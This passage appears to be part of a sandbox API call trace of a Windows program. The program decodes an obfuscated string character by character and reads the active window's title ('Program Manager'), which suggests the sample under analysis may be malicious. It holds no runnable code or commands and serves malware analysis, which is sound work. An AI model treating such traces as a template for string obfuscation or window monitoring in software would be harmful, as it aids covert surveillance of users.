cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.986] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.986] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.987] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.987] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.988] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.988] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.989] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.989] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.990] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.990] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.991] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.991] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.992] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.992] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.993] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.996] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.997] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.997] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.998] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.998] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.999] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.999] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.000] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.000] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.001] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.001] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.001] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.002] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.002] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.003] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.003] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.004] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.004] GetForegroundWindow () returned 0x20086 [0180.004] GetLastError () returned 0x0 [0180.004] SysStringLen (param_1=" ") returned 0xff [0180.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.004] SysStringLen (param_1=" ") returned 0xff [0180.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.005] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.005] GetLastError () returned 0x0 [0180.005] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.005] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.006] SysStringLen (param_1="Program Manager") returned 0x10 [0180.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x114721c, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0180.006] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0180.006] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0180.006] GetFocus () returned 0x0 [0180.006] lstrlenA (lpString="Program Manager") returned 15 [0180.006] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x114721c) returned 0x1 [0180.007] IsWindow (hWnd=0x103c4) returned 1 [0180.007] IsWindow (hWnd=0x103c4) returned 1 [0180.007] IsWindow (hWnd=0x103c4) returned 1 [0180.007] IsWindow (hWnd=0x103c4) returned 1 [0180.008] GetFocus () returned 0x0 [0180.008] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0180.008] GetFocus () returned 0x0 [0180.008] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0180.056] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0180.056] GetFocus () returned 0x0 [0180.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0180.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x114721c, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0180.057] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0180.057] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.058] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0180.058] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.059] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.059] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.060] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.060] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.061] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.061] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.062] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.062] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.063] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.063] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.064] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.064] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.064] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.065] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.065] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.066] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.066] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.066] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.067] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.067] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.068] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.068] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.069] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.069] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.070] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.070] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.070] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.104] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.104] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, 